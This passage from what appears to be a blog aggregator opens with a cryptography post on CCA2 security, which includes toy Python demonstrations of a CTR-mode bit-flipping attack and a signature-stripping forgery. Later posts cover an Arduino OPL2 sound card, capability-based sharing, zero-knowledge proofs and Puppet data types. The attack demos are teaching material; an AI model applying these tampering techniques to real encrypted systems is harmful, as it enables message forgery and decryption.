The second thing you should notice is that we impose a single extra condition in step (4), namely that the attacker cannot ask us to decrypt $C^*$. We do this only to prevent the game from being “trivial” — if we did not impose this requirement, the attacker could always just hand us back $C^*$ to decrypt, and they would always learn the value of $b$.

(Notice as well that we do not give the attacker the ability to request encryptions of chosen plaintexts. We don’t need to do that in the public key encryption version of this game, because we’re focusing exclusively on public-key encryption here — since the attacker has the public key, she can encrypt anything she wants without my help.)

With definitions out of the way, let’s talk a bit about how we achieve CCA2 security in real schemes.

### A quick detour: symmetric encryption

This post is mainly going to focus on public-key encryption, because that’s actually the problem that’s challenging and interesting to solve. It turns out that achieving CCA2 for symmetric-key encryption is really easy. Let me briefly explain why this is, and why the same ideas don’t work for public-key encryption.

(To explain this, we’ll need to slightly tweak the CCA2 definition above to make it work in the symmetric setting. The changes here are small: we won’t give the attacker a public key in step (1), and at steps (2) and (4) we will allow the attacker to request the encryption of chosen plaintexts as well as the decryption.)

The first observation is that many common encryption schemes — particularly, the widely-used cipher modes of operation like CBC and CTR — are semantically secure in a model where the attacker does not have the ability to decrypt chosen ciphertexts. However, these same schemes break completely in the CCA2 model.

The simple reason for this is ciphertext malleability. Take CTR mode, which is particularly easy to mess with. Say we’ve obtained the challenge ciphertext $C^*$ at step (3) (recall that $C^*$ is the encryption of $M_b$). It’s trivially easy to “maul” this ciphertext — simply by flipping, say, a bit of the message (i.e., XORing it with “1”), we obtain a new ciphertext $C' = C^* \oplus 1$ that the rules of the game allow us to submit for decryption. The oracle returns $M_b \oplus 1$, which we can use to figure out $b$.
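Here is that attack in miniature. A toy SHA-256-based keystream stands in for real AES-CTR (the construction is mine, purely for illustration — do not use it for anything):

```python
import hashlib

def keystream(key, n):
    # toy PRG: SHA-256 over (key, counter) blocks -- a stand-in for AES-CTR
    out, ctr = b'', 0
    while len(out) < n:
        out += hashlib.sha256(key + ctr.to_bytes(8, 'big')).digest()
        ctr += 1
    return out[:n]

xor = lambda a, b: bytes(x ^ y for x, y in zip(a, b))

key = b'shared secret'
m_b = b'attack at dawn'
c_star = xor(m_b, keystream(key, len(m_b)))        # the challenge ciphertext

c_maul = bytes([c_star[0] ^ 1]) + c_star[1:]       # flip one ciphertext bit
m_maul = xor(c_maul, keystream(key, len(c_maul)))  # submit C' for decryption

# the oracle's answer is M_b with the same bit flipped -- enough to identify M_b
assert m_maul == bytes([m_b[0] ^ 1]) + m_b[1:]
```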

(A related, but “real world” variant of this attack is Vaudenay’s Padding Oracle Attack, which breaks actual implementations of symmetric-key cryptosystems. Here’s one we did against Apple iMessage. Here’s an older one on XML encryption.)

So how do we fix this problem? The straightforward observation is that we need to prevent the attacker from mauling the ciphertext $C^*$. The generic approach to doing this is to modify the encryption scheme so that it includes a Message Authentication Code (MAC) tag computed over every CTR-mode ciphertext. The key for this MAC scheme is generated by the encrypting party (me) and kept with the encryption key. When asked to decrypt a ciphertext, the decryptor first checks whether the MAC is valid. If it’s not, the decryption routine will output “ERROR”. Assuming an appropriate MAC scheme, the attacker can’t modify the ciphertext (including the MAC) without causing the decryption to fail and produce a useless result.
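Sketched with Python’s standard-library hmac (the function names are mine): the decryptor verifies the tag first and refuses any mauled ciphertext before decryption ever runs.

```python
import hmac, hashlib

TAG_LEN = 32

def seal(mac_key, ciphertext):
    # append an HMAC-SHA256 tag computed over the whole ciphertext
    return ciphertext + hmac.new(mac_key, ciphertext, hashlib.sha256).digest()

def open_sealed(mac_key, blob):
    ciphertext, tag = blob[:-TAG_LEN], blob[-TAG_LEN:]
    expected = hmac.new(mac_key, ciphertext, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return "ERROR"          # reject before any decryption happens
    return ciphertext

mac_key = b'secret mac key'
blob = seal(mac_key, b'some CTR-mode ciphertext')
assert open_sealed(mac_key, blob) == b'some CTR-mode ciphertext'

mauled = bytes([blob[0] ^ 1]) + blob[1:]   # the bit-flipping trick from above
assert open_sealed(mac_key, mauled) == "ERROR"
```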

So in short: in the symmetric encryption setting, the answer to CCA2 security is simply for the encrypting parties to authenticate each ciphertext using a secret authentication (MAC) key they generate. Since we’re talking about symmetric encryption, that extra (secret) authentication key can be generated and stored with the decryption key. (Some more efficient schemes make this all work with a single key, but that’s just an engineering convenience.) Everything works out fine.

So now we get to the big question.

### CCA security is easy in symmetric encryption. Why can’t we just do the same thing for public-key encryption?

As we saw above, it turns out that strong authenticated encryption is sufficient to get CCA(2) security in the world of symmetric encryption. Sadly, when you try this same idea generically in public key encryption, it doesn’t always work. There’s a short reason for this, and a long one. The short version is: it matters who is doing the encryption.

Let’s focus on the critical difference. In the symmetric CCA2 game above, there is exactly one person who is able to (legitimately) encrypt ciphertexts. That person is me. To put it more clearly: the person who performs the legitimate encryption operations (and has the secret key) is also the same person who is performing decryption.

Even if the encryptor and decryptor aren’t literally the same person, the encryptor still has to be honest. (To see why this has to be the case, remember that the encryptor holds the shared secret key! If that party were a bad guy, the whole scheme would be broken, since they could simply hand the secret key over to the bad guys.) And once you’ve made the stipulation that the encryptor is honest, then you’re almost all the way there. It suffices simply to add some kind of authentication (a MAC or a signature) to any ciphertext she encrypts. At that point the decryptor only needs to determine whether any given ciphertext actually came from the (honest) encryptor, and avoid decrypting the bad ones. You’re done.

Public key encryption (PKE) fundamentally breaks all these assumptions.

In a public-key encryption scheme, the main idea is that anyone can encrypt a message to you, once they get a copy of your public key. The encryption algorithm may sometimes be run by good, honest people. But it can also be run by malicious people. It can be run by parties who are adversarial. The decryptor has to be able to deal with all of those cases. One can’t simply assume that the “real” encryptor is honest.

Let me give a concrete example of how this can hurt you. A couple of years ago I wrote a post about flaws in Apple iMessage, which (at the time) used a simple authenticated (public-key) encryption scheme. The basic iMessage encryption algorithm used public-key encryption (actually a combination of RSA with some AES thrown in for efficiency) so that anyone could encrypt a message to my key. For authenticity, it required that every message be signed with an ECDSA signature by the sender.

When I received a message, I would look up the sender’s public key and first make sure the signature was valid. This would prevent bad guys from tampering with the message in flight — e.g., executing nasty stuff like adaptive chosen ciphertext attacks. If you squint a little, this is almost exactly a direct translation of the symmetric crypto approach we discussed above. We’re simply swapping the MAC for a digital signature.

The problems with this scheme start to become apparent when we consider that there might be multiple people sending me ciphertexts. Let’s say the adversary is on the communication path and intercepts a signed message from you to me. They want to change (i.e., maul) the message so that they can execute some kind of clever attack. Well, it turns out this is simple. They simply rip off the honest signature and replace it with one they make themselves:

The new message is identical, but now appears to come from a different person (the attacker). Since the attacker has their own signing key, they can maul the encrypted message as much as they want, and sign new versions of that message. If you plug this attack into (a version of) the public-key CCA2 game up top, you see they’ll win quite easily. All they have to do is modify the challenge ciphertext $C^*$ at step (4) so that it is signed with their own signing key, change it by munging with the CTR-mode encryption, and request the decryption of that ciphertext.
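A toy model of the signature-stripping step (HMAC stands in for ECDSA, and all names here are mine): verification still succeeds — but under the attacker’s own key, on a tampered ciphertext.

```python
import hmac, hashlib

signing_keys = {'alice': b'alice-key', 'mallory': b'mallory-key'}  # toy key directory

def sign(sender, ciphertext):
    tag = hmac.new(signing_keys[sender], ciphertext, hashlib.sha256).digest()
    return {'from': sender, 'ct': ciphertext, 'sig': tag}

def verify(msg):
    expected = hmac.new(signing_keys[msg['from']], msg['ct'], hashlib.sha256).digest()
    return hmac.compare_digest(msg['sig'], expected)

legit = sign('alice', b'ciphertext from alice')            # intercepted in flight
mauled_ct = bytes([legit['ct'][0] ^ 1]) + legit['ct'][1:]  # tamper with the ciphertext
forged = sign('mallory', mauled_ct)                        # rip off the signature, re-sign

assert verify(forged)              # passes: it is validly signed -- by the attacker
assert forged['from'] != 'alice'   # only the claimed sender has changed
```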

Of course if I only accept messages signed by some original (guaranteed-to-be-honest) sender, this scheme might work out fine. But that’s not the point of public key encryption. In a real public-key scheme — like the one Apple iMessage was trying to build — I should be able to (safely) decrypt messages from anyone, and in that setting this naive scheme breaks down pretty badly.

Whew.

Ok, this post has gotten a bit long, and so far I haven’t actually gotten to the various “tricks” for adding chosen ciphertext security to real public key encryption schemes. That will have to wait until the next post, to come shortly.

### Vincent Bernat

#### OPL2 Audio Board: an AdLib sound card for Arduino

In a previous article, I presented the OPL2LPT, a sound card for the parallel port featuring a Yamaha YM3812 chip, also known as OPL2—the chip of the AdLib sound card. The OPL2 Audio Board for Arduino is another indie sound card using this chip. However, instead of relying on a parallel port, it uses a serial interface, which can be driven from an Arduino board or a Raspberry Pi. While the OPL2LPT targets retrogamers with real hardware, the OPL2 Audio Board cannot be used in the same way. Nonetheless, it can also be operated from ScummVM and DOSBox!

# Unboxing

The OPL2 Audio Board can be purchased on Tindie, either as a kit or fully assembled. I have paired it with a cheap clone of the Arduino Nano. A library to drive the board is available on GitHub, along with some examples.

One of them is DemoTune.ino. It plays a short tune on three channels. It can be compiled and uploaded to the Arduino with PlatformIO—installable with pip install platformio—using the following command:1

$ platformio ci \
    --board nanoatmega328 \
    --lib ../../src \
    --project-option="targets=upload" \
    --project-option="upload_port=/dev/ttyUSB0" \
    DemoTune.ino
[...]
PLATFORM: Atmel AVR > Arduino Nano ATmega328
SYSTEM: ATMEGA328P 16MHz 2KB RAM (30KB Flash)
Converting DemoTune.ino
[...]
Configuring upload protocol...
AVAILABLE: arduino
CURRENT: upload_protocol = arduino
Looking for upload port...
Use manually specified: /dev/ttyUSB0
Uploading .pioenvs/nanoatmega328/firmware.hex
[...]
avrdude: 6618 bytes of flash written
[...]
===== [SUCCESS] Took 5.94 seconds =====


Immediately after the upload, the Arduino plays the tune. 🎶

The next interesting example is SerialIface.ino. It turns the audio board into a sound card over the serial port. Once the code has been pushed to the Arduino, you can use the play.py program in the same directory to play VGM files. VGM is a sample-accurate sound format for many sound chips: it logs the exact commands sent to the chip. There are many VGM files on VGMRips. Be sure to choose the ones for the YM3812/OPL2! Here is a small selection:

# Usage with DOSBox & ScummVM

Notice

The support for the serial protocol used in this section has not been merged yet. In the meantime, grab SerialIface.ino from the pull request: git checkout 50e1717.

When the Arduino is flashed with SerialIface.ino, the board can be driven through a simple protocol over the serial port. By patching DOSBox and ScummVM, we can make them use this unusual sound card. Here are some examples of games:

• 0:00, with DOSBox, the first level of Doom 🎮 (1993)
• 1:06, with DOSBox, the introduction of Loom 🎼 (1990)
• 2:38, with DOSBox, the first level of Lemmings 🐹 (1991)
• 3:32, with DOSBox, the introduction of Legend of Kyrandia 🃏 (1992)
• 6:47, with ScummVM, the introduction of Day of the Tentacle ☢️ (1993)
• 11:10, with DOSBox, the introduction of Another World 🐅 (1991)

Another World (also known as Out of This World), designed by Éric Chahi, uses sampled sounds at 5 kHz or 10 kHz.
With a serial port operating at 115,200 bits/s, the 5 kHz option is just within our reach. However, I have no idea if the rendering is faithful.

Update (2018.05)

After some discussions with Walter van Niftrik, we came to the conclusion that, above 1 kHz, DOSBox doesn’t “time-accurately” execute OPL commands. It is using a time slice of one millisecond during which it executes either a fixed number of CPU cycles or as many as possible (with cycles=max). In both cases, emulated CPU instructions are executed as fast as possible and I/O delays are simulated by removing a fixed number of cycles from the allocation of the current time slice.

## DOSBox

The serial protocol is described in the SerialIface.ino file:

/*
 * A very simple serial protocol is used.
 *
 * - Initial 3-way handshake to overcome reset delay / serial noise issues.
 * - 5-byte binary commands to write registers.
 *   - (uint8) OPL2 register address
 *   - (uint8) OPL2 register data
 *   - (int16) delay (milliseconds); negative -> pre-delay; positive -> post-delay
 *   - (uint8) delay (microseconds / 4)
 *
 * Example session:
 *
 * Arduino: HLO!
 * PC:      BUF?
 * Arduino: 256 (switches to binary mode)
 * PC:      0xb80a014f02 (write OPL register and delay)
 * Arduino: k
 *
 * A variant of this protocol is available without the delays. In this
 * case, the BUF? command should be sent as B0F? The binary protocol
 * is now using 2-byte binary commands:
 *   - (uint8) OPL2 register address
 *   - (uint8) OPL2 register data
 */

Adding support for this protocol in DOSBox is relatively simple (patch). For best performance, we use the 2-byte variant (5000 ops/s). The binary commands are pipelined and a dedicated thread collects the acknowledgments. A semaphore captures the number of free slots in the receive buffer. As it is not possible to read registers, we rely on DOSBox to emulate the timers, which are mostly used to let the various games detect the OPL2. The patch is tested only on Linux but should work on any POSIX system—not Windows.

To test it, you need to build DOSBox from source:

$ sudo apt build-dep dosbox
$ git clone https://github.com/vincentbernat/dosbox.git -b feature/opl2audioboard
$ cd dosbox
$ ./autogen.sh
$ ./configure && make
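The 5-byte command format described in SerialIface.ino can be packed with Python’s struct module (the helper name is mine, and I’m reading the example session’s 0xb80a014f02 as big-endian fields):

```python
import struct

def opl2_command(register, data, delay_ms=0, delay_us4=0):
    """Pack one 5-byte SerialIface command: uint8 register, uint8 data,
    int16 delay in ms (negative = pre-delay), uint8 delay in units of 4 us."""
    return struct.pack('>BBhB', register, data, delay_ms, delay_us4)

assert opl2_command(0xb8, 0x0a, 0x014f, 0x02).hex() == 'b80a014f02'
```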


Replace the sblaster section of ~/.dosbox/dosbox-SVN.conf:

[sblaster]
sbtype=none
oplmode=opl2
oplrate=49716
oplemu=opl2arduino
opl2arduino=/dev/ttyUSB0


Then, run DOSBox with ./src/dosbox. That’s it!

You will likely get the “OPL2Arduino: too slow, consider increasing buffer” message a lot. To fix this, you need to recompile SerialIface.ino with a bigger receive buffer:

$ platformio ci \
    --board nanoatmega328 \
    --lib ../../src \
    --project-option="targets=upload" \
    --project-option="upload_port=/dev/ttyUSB0" \
    --project-option="build_flags=-DSERIAL_RX_BUFFER_SIZE=512" \
    SerialIface.ino


## ScummVM

The same code can be adapted for ScummVM (patch). To test it, build ScummVM from source:

$ sudo apt build-dep scummvm
$ git clone https://github.com/vincentbernat/scummvm.git -b feature/opl2audioboard
$ cd scummvm
$ ./configure --disable-all-engines --enable-engine=scumm && make

Then, you can start ScummVM with ./scummvm. Select “AdLib Emulator” as the music device and “OPL2 Arduino” as the AdLib emulator.2 Like for DOSBox, watch the console to check if you need a larger receive buffer. Enjoy! 😍

1. This command is valid for an Arduino Nano. For another board, take a look at the output of platformio boards arduino. ↩︎

2. If you need to specify a serial port other than /dev/ttyUSB0, add a line opl2arduino_device= in the ~/.scummvmrc configuration file. ↩︎

## April 20, 2018

### Sarah Allen

#### false dichotomy of control vs sharing

Email is the killer app of the Internet. Amidst many sharing and collaboration applications and services, most of us frequently fall back to email. Marc Stiegler suggests that email often “just works better”. Why is this?

Digital communication is fast across distances and allows access to incredible volumes of information, yet digital access controls typically force us into a false dichotomy of control vs sharing.

Looking at physical models of sharing and access control, we can see that we already have well-established models where we can give up control temporarily, yet not completely. Alan Karp illustrated this nicely at last week’s Internet Identity Workshop (IIW) in a quick anecdote:

Marc gave me the key to his car so I could park it in my garage. I couldn’t do it, so I gave the key to my kid, and asked my neighbor to do it for me. She stopped by my house, got the key and used it to park Marc’s car in my garage.

The car key scenario is clear. In addition to possession of the key, there’s even another layer of control — if my kid doesn’t have a driver’s license, then he can’t drive the car, even if he holds the key.

When we translate this story to our modern digital realm, it sounds crazy:

Marc gave me his password so I could copy a file from his computer to mine.
I couldn’t do it, so I gave Marc’s password to my kid, and asked my neighbor to do it for me. She stopped by my house so my kid could tell her my password, and then she used it to copy the file from Marc’s computer to mine.

After the conference, I read Marc Stiegler’s 2009 paper Rich Sharing for the Web, which details key features of sharing that we have in the real world, all illustrated in the anecdote that Alan so effectively rattled off. These 6 features (enumerated below) enable people to create networks of access rights that implement the Principle of Least Authority (POLA). The key is to limit how much you need to trust someone before sharing.

“Systems that do not implement these 6 features will feel rigid and inadequately functional once enough users are involved, forcing the users to seek alternate means to work around the limitations in those applications.”

1. Dynamic: I can grant access quickly and effortlessly (without involving an administrator).
2. Attenuated: To give you permission to do or see one thing, I don’t have to give you permission to do everything. (e.g. a valet key allows driving, but not access to the trunk)
3. Chained: Authority may be delegated (and re-delegated).
4. Composable: I have permission to drive a car from the State of California, and Marc’s car key. I require both permissions together to drive the car.
5. Cross-jurisdiction: There are three families involved, each with its own policies, yet there’s no need to communicate policies to another jurisdiction. In the example, I didn’t need to ask Marc to change his policy to grant my neighbor permission to drive his car.
6. Accountable: If Marc finds a new scratch on his car, he knows to ask me to pay for the repair. It’s up to me to collect from my neighbor. Digital access control systems will typically record who did which action, but don’t record who asked an administrator to grant permission.

Note: Accountability is not always directly linked to delegation.
Marc would likely hold me accountable if his car got scratched, even if my neighbor had damaged the car when parking it in the garage. Whereas, if it isn’t my garage but rather a repair shop where my neighbor drops off the car for Marc, then if the repair shop damages the car, Marc would hold them responsible.

## How does this work for email?

The following examples from Marc’s paper were edited for brevity:

• Dynamic: You can send email to anyone any time.
• Attenuated: When I email you an attachment, I’m sending a read-only copy. You don’t have access to my whole hard drive and you don’t expect that modifying it will change my copy.
• Chained: I can forward you an email. You can then forward it to someone else.
• Cross-Domain: I can send email to people at other companies and organizations with permissions from their IT dept.
• Composable: I can include an attachment from email originating at one company with text or another attachment from another email and send it to whoever I want.
• Accountable: If Alice asks Bob to edit a file and email it back, and Bob asks Carol to edit the file, and Bob then emails it back, Alice will hold Bob responsible if the edits are erroneous. If Carol (whom Alice may not know) emails her result directly to Alice, either Alice will ask Carol who she is before accepting the changes, or if Carol includes the history of messages in the message, Alice will directly see, once again, that she should hold Bob responsible.

## Further reading

Alan Karp’s IoT Position Paper compares several sharing tools across these 6 features and also discusses ZBAC (authoriZation-Based Access Control), where authorization is known as a “capability.” An object capability is an unforgeable token that both designates a resource and grants permission to access it.

## April 07, 2018

### Sarah Allen

#### zero-knowledge proof: trust without shared secrets

In cryptography we typically share a secret which allows us to decrypt future messages.
Commonly this is a password that I make up and submit to a Web site, then later produce to verify I am the same person.

I missed Kazue Sako’s Zero Knowledge Proofs 101 presentation at IIW last week, but Rachel Myers shared an impressively simple retelling in the car on the way back to San Francisco, which inspired me to read the notes and review the proof for myself. I’ve attempted to reproduce this simple explanation below, also noting additional sources and related articles.

Zero Knowledge Proofs (ZKPs) are very useful when applied to internet identity — with an interactive exchange you can prove you know a secret without actually revealing the secret.

Understanding Zero Knowledge Proofs with simple math:

### x -> f(x)

A simple one-way function: easy to go one way from x to f(x), but mathematically hard to go from f(x) to x. The most common example is a hash function. Wired: What is Password Hashing? provides an accessible introduction to why hash functions are important to cryptographic applications today.

### f(x) = g ^ x mod p

Known (public): g, p

• g is a constant
• p has to be prime

It is easy to know x and compute g ^ x mod p, but difficult to do in reverse.

### Interactive Proof

Alice wants to prove to Bob that she knows x without giving any information about x. Bob already knows f(x). Alice can make f(x) public and then prove that she knows x through an interactive exchange with anyone on the Internet, in this case, Bob.

1. Alice publishes f(x): g^x mod p
2. Alice picks a random number r
3. Alice sends Bob u = g^r mod p
4. Now Bob has an artifact based on that random number, but can’t actually calculate the random number
5. Bob returns a challenge e, either 0 or 1
6. Alice responds with v: if e == 0, v = r; if e == 1, v = r + x
7. Bob can now calculate: if e == 0, he has the random number r as well as the publicly known variables, and can check whether u == g^v mod p; if e == 1, he can check whether u*f(x) == g^v (mod p)

I believe step 6 is true based on Congruence of Powers, though I’m not sure that I’ve transcribed the e == 1 case accurately with my limited ascii representation.

If r is truly random, equally distributed between zero and (p-1), this does not leak any information about x, which is pretty neat, yet not sufficient. In order to ensure that Alice cannot be impersonated, multiple iterations are required along with the use of large numbers (see IIW session notes).

## Further Reading

## April 05, 2018

### Marios Zindilis

#### A small web application with Angular5 and Django

Django works well as the back-end of an application that uses Angular5 in the front-end. In my attempt to learn Angular5 well enough to build a small proof-of-concept application, I couldn't find a simple working example of a combination of the two frameworks, so I created one. I called this the Pizza Maker. It's available on GitHub, and its documentation is in the README. If you have any feedback, please open an issue on GitHub.

## April 03, 2018

### R.I.Pienaar

#### Adding rich object data types to Puppet

Extending Puppet using types, providers, facts and functions is well known and widely done. Something newer is adding entire new data types to the Puppet DSL to create entirely new language behaviours. I’ve done a bunch of this recently with the Choria Playbooks and some other fun experiments; today I’ll walk through building a small network-wide spec system using the Puppet DSL.

## Overview

A quick look at what we want to achieve here: I want to be able to do Choria RPC requests and assert their outcomes. I want to write tests using the Puppet DSL, and they should run on a specially prepared environment.
In my case I have an AWS environment with CentOS, Ubuntu, Debian and Archlinux machines.

Below I test the File Manager Agent:

• Get status for a known file and make sure it finds the file
• Create a brand new file, ensure it reports success
• Verify that the file exists and is empty using the status action

cspec::suite("filemgr agent tests", $fail_fast, $report) |$suite| {

  # Checks an existing file
  $suite.it("Should get file details") |$t| {
    $results = choria::task("mcollective",
      _catch_errors => true,
      "action" => "filemgr.status",
      "nodes" => $nodes,
      "silent" => true,
      "fact_filter" => ["kernel=Linux"],
      "properties" => {
        "file" => "/etc/hosts"
      }
    )

    $t.assert_task_success($results)

    $results.each |$result| {
      $t.assert_task_data_equals($result, $result["data"]["present"], 1)
    }
  }

  # Make a new file and check it exists
  $suite.it("Should support touch") |$t| {
    $fname = sprintf("/tmp/filemgr.%s", strftime(Timestamp(), "%s"))

    $r1 = choria::task("mcollective",
      _catch_errors => true,
      "action" => "filemgr.touch",
      "nodes" => $nodes,
      "silent" => true,
      "fact_filter" => ["kernel=Linux"],
      "fail_ok" => true,
      "properties" => {
        "file" => $fname
      }
    )

    $t.assert_task_success($r1)

    $r2 = choria::task("mcollective",
      _catch_errors => true,
      "action" => "filemgr.status",
      "nodes" => $nodes,
      "silent" => true,
      "fact_filter" => ["kernel=Linux"],
      "properties" => {
        "file" => $fname
      }
    )

    $t.assert_task_success($r2)

    $r2.each |$result| {
      $t.assert_task_data_equals($result, $result["data"]["present"], 1)
      $t.assert_task_data_equals($result, $result["data"]["size"], 0)
    }
  }
}

I also want to be able to test other things like lets say discovery:

cspec::suite("${method} discovery method", $fail_fast, $report) |$suite| {
  $suite.it("Should support a basic discovery") |$t| {
    $found = choria::discover(
      "discovery_method" => $method,
    )

    $t.assert_equal($found.sort, $all_nodes.sort)
  }
}

So we want to make a Spec-like system that can drive Puppet Plans (aka Choria Playbooks) and do various assertions on the outcome. We want to run it with mco playbook run and it should write a JSON report to disk with all suites, cases and assertions.

## Adding a new Data Type to Puppet

I’ll show how to add the Cspec::Suite data type to Puppet. This comes in two parts: you have to describe the Type that is exposed to Puppet, and you have to provide a Ruby implementation of the Type.

### Describing the Objects

Here we create the signature for Cspec::Suite:

# modules/cspec/lib/puppet/datatypes/cspec/suite.rb
Puppet::DataTypes.create_type("Cspec::Suite") do
  interface <<-PUPPET
    attributes => {
      "description" => String,
      "fail_fast" => Boolean,
      "report" => String
    },
    functions => {
      it => Callable[[String, Callable[Cspec::Case]], Any],
    }
  PUPPET

  load_file "puppet_x/cspec/suite"

  implementation_class PuppetX::Cspec::Suite
end

As you can see from the line of code cspec::suite("filemgr agent tests", $fail_fast, $report) |$suite| {...}, we pass 3 arguments: a description of the test, whether the test should fail immediately on any error or keep going, and where to write the report of the suite to. This corresponds to the attributes here. A function that will be shown later takes these and makes our instance.

We then have to add our it() function, which again takes a description and yields out a Cspec::Case; it can return any value.

When Puppet needs the implementation of this code it will call the Ruby class PuppetX::Cspec::Suite.

Here is the same for the Cspec::Case:

```ruby
# modules/cspec/lib/puppet/datatypes/cspec/case.rb
Puppet::DataTypes.create_type("Cspec::Case") do
  interface <<-PUPPET
    attributes => {
      "description" => String,
      "suite" => Cspec::Suite
    },
    functions => {
      assert_equal => Callable[[Any, Any], Boolean],
      assert_task_success => Callable[[Choria::TaskResults], Boolean],
      assert_task_data_equals => Callable[[Choria::TaskResult, Any, Any], Boolean]
    }
  PUPPET

  load_file "puppet_x/cspec/case"

  implementation_class PuppetX::Cspec::Case
end
```

The implementation is a Ruby class that provides the logic we want. I won't show the entire thing with reporting and everything, but you'll get the basic idea:

```ruby
# modules/cspec/lib/puppet_x/cspec/suite.rb
module PuppetX
  class Cspec
    class Suite
      # Puppet calls this method when it needs an instance of this type
      def self.from_asserted_hash(description, fail_fast, report)
        new(description, fail_fast, report)
      end

      attr_reader :description, :fail_fast

      def initialize(description, fail_fast, report)
        @description = description
        @fail_fast = !!fail_fast
        @report = report
        @testcases = []
      end

      # what puppet file and line the Puppet DSL is on
      def puppet_file_line
        fl = Puppet::Pops::PuppetStack.stacktrace[0]

        [fl[0], fl[1]]
      end

      def outcome
        {
          "testsuite" => @description,
          "testcases" => @testcases,
          "file" => puppet_file_line[0],
          "line" => puppet_file_line[1],
          "success" => @testcases.all? {|t| t["success"]}
        }
      end

      # Writes the memory state to disk, see outcome above
      def write_report
        # ...
      end

      def run_suite
        Puppet.notice(">>>")
        Puppet.notice(">>> Starting test suite: %s" % [@description])
        Puppet.notice(">>>")

        begin
          yield(self)
        ensure
          write_report
        end

        Puppet.notice(">>>")
        Puppet.notice(">>> Completed test suite: %s" % [@description])
        Puppet.notice(">>>")
      end

      def it(description, &blk)
        require_relative "case"

        t = PuppetX::Cspec::Case.new(self, description)
        t.run(&blk)
      ensure
        @testcases << t.outcome
      end
    end
  end
end
```

And here is the Cspec::Case:

```ruby
# modules/cspec/lib/puppet_x/cspec/case.rb
module PuppetX
  class Cspec
    class Case
      # Puppet calls this to make instances
      def self.from_asserted_hash(suite, description)
        new(suite, description)
      end

      def initialize(suite, description)
        @suite = suite
        @description = description
        @assertions = []
        @start_location = puppet_file_line
      end

      # assert 2 things are equal and show sender etc in the output
      def assert_task_data_equals(result, left, right)
        if left == right
          success("assert_task_data_equals", "%s success" % result.host)
          return true
        end

        failure("assert_task_data_equals: %s" % result.host, "%s\n\n\tis not equal to\n\n %s" % [left, right])
      end

      # checks the outcome of a choria RPC request and make sure its fine
      def assert_task_success(results)
        if results.error_set.empty?
          success("assert_task_success:", "%d OK results" % results.count)
          return true
        end

        failure("assert_task_success:", "%d failures" % [results.error_set.count])
      end

      # assert 2 things are equal
      def assert_equal(left, right)
        if left == right
          success("assert_equal", "values matches")
          return true
        end

        failure("assert_equal", "%s\n\n\tis not equal to\n\n %s" % [left, right])
      end

      # the puppet .pp file and line Puppet is on
      def puppet_file_line
        fl = Puppet::Pops::PuppetStack.stacktrace[0]

        [fl[0], fl[1]]
      end

      # show a OK message, store the assertions that ran
      def success(what, message)
        @assertions << {
          "success" => true,
          "kind" => what,
          "file" => puppet_file_line[0],
          "line" => puppet_file_line[1],
          "message" => message
        }

        Puppet.notice("✔︎ %s: %s" % [what, message])
      end

      # show a Error message, store the assertions that ran
      def failure(what, message)
        @assertions << {
          "success" => false,
          "kind" => what,
          "file" => puppet_file_line[0],
          "line" => puppet_file_line[1],
          "message" => message
        }

        Puppet.err("✘ %s: %s" % [what, @description])
        Puppet.err(message)

        raise(Puppet::Error, "Test case %s fast failed: %s" % [@description, what]) if @suite.fail_fast
      end

      # this will show up in the report JSON
      def outcome
        {
          "testcase" => @description,
          "assertions" => @assertions,
          "success" => @assertions.all? {|a| a["success"]},
          "file" => @start_location[0],
          "line" => @start_location[1]
        }
      end

      # invokes the test case
      def run
        Puppet.notice("==== Test case: %s" % [@description])

        # runs the puppet block
        yield(self)

        success("testcase", @description)
      end
    end
  end
end
```

Finally I am going to need a little function to create the suite: the cspec::suite function. It really just creates an instance of PuppetX::Cspec::Suite for us.

```ruby
# modules/cspec/lib/puppet/functions/cspec/suite.rb
Puppet::Functions.create_function(:"cspec::suite") do
  dispatch :handler do
    param "String", :description
    param "Boolean", :fail_fast
    param "String", :report

    block_param

    return_type "Cspec::Suite"
  end

  def handler(description, fail_fast, report, &blk)
    suite = PuppetX::Cspec::Suite.new(description, fail_fast, report)

    suite.run_suite(&blk)
    suite
  end
end
```
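Stripped of the Puppet plumbing, the control flow these pieces implement is a small xUnit-style pattern: the suite yields itself to a block, it() creates a case, runs it, records its outcome whether it passed or not, and fail-fast turns an assertion failure into an exception. A minimal sketch of that pattern in plain Python (all names here are illustrative, not part of Cspec):

```python
class Case:
    """One test case collecting assertion outcomes, like PuppetX::Cspec::Case."""

    def __init__(self, description, fail_fast):
        self.description = description
        self.fail_fast = fail_fast
        self.assertions = []

    def assert_equal(self, left, right):
        ok = left == right
        self.assertions.append({"kind": "assert_equal", "success": ok})
        if not ok and self.fail_fast:
            # mirrors the Puppet::Error raised when the suite is fail-fast
            raise RuntimeError("Test case %s fast failed" % self.description)
        return ok

    def outcome(self):
        return {
            "testcase": self.description,
            "assertions": self.assertions,
            "success": all(a["success"] for a in self.assertions),
        }


class Suite:
    """Collects case outcomes, like PuppetX::Cspec::Suite."""

    def __init__(self, description, fail_fast=False):
        self.description = description
        self.fail_fast = fail_fast
        self.testcases = []

    def it(self, description, block):
        t = Case(description, self.fail_fast)
        try:
            block(t)
        finally:
            # outcome is recorded even when an assertion raised
            self.testcases.append(t.outcome())

    def outcome(self):
        return {
            "testsuite": self.description,
            "testcases": self.testcases,
            "success": all(t["success"] for t in self.testcases),
        }


suite = Suite("filemgr agent tests")
suite.it("Should get file details", lambda t: t.assert_equal(1, 1))
suite.it("Should support touch", lambda t: t.assert_equal(1, 2))
print(suite.outcome()["success"])  # prints False: one case failed
```

The real implementation does the same bookkeeping, just with the outcomes flowing into the JSON report on disk.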

## Bringing it together

So that's about it. It's very simple really; the code above is pretty basic stuff, and I hacked it together in a day basically.

Let's see how we turn these building blocks into a test suite.

I need an entry point that drives the suite. Imagine I will have many different plans to run, one per agent, and that I want to do some pre- and post-run tasks etc.

```puppet
plan cspec::suite (
  Boolean $fail_fast = false,
  Boolean $pre_post = true,
  Stdlib::Absolutepath $report,
  String $data
) {
  $ds = {
    "type" => "file",
    "file" => $data,
    "format" => "yaml"
  }

  # initializes the report
  cspec::clear_report($report)

  # force a puppet run everywhere so PuppetDB is up to date, disables Puppet, wait for them to finish
  if $pre_post {
    choria::run_playbook("cspec::pre_flight", ds => $ds)
  }

  # Run our test suite
  choria::run_playbook("cspec::run_suites",
    _catch_errors => true,
    ds => $ds,
    fail_fast => $fail_fast,
    report => $report
  ).choria::on_error |$err| {
    err("Test suite failed with a critical error:${err.message}")
  }

  # enables Puppet
  if $pre_post {
    choria::run_playbook("cspec::post_flight", ds => $ds)
